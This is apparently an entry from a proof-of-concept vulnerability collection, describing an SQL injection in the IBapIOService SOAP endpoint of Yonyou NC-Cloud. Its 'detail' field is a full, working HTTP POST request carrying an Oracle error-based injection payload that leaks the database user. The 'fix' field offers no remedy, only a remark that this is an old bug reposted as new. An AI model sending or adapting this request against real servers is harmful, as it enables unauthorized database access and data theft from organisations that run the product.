vendor = "用友"
name = "用友NC-Cloud IBapIOService存在SQL注入"
type = "SQL注入"
version = "未知"
path = "/uapws/service/nc.itf.bap.service.IBapIOService"
detail = "POST /uapws/service/nc.itf.bap.service.IBapIOService HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeContent-Type: text/xml <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:gs=\"http://service.bap.itf.nc/IBapIOService\"> <soapenv:Header/> <soapenv:Body> <gs:getBapTableDatas> <gs:stringarrayItem> DWQueue@MessageQueue' AND 1=UTL_INADDR.GET_HOST_ADDRESS('~'||(user)||'~')-- abc </gs:stringarrayItem> </gs:getBapTableDatas> </soapenv:Body></soapenv:Envelope>"
fix = "老洞，有人当新洞发"
date = "0705"
label = "nday"
verifier = "AdySec"
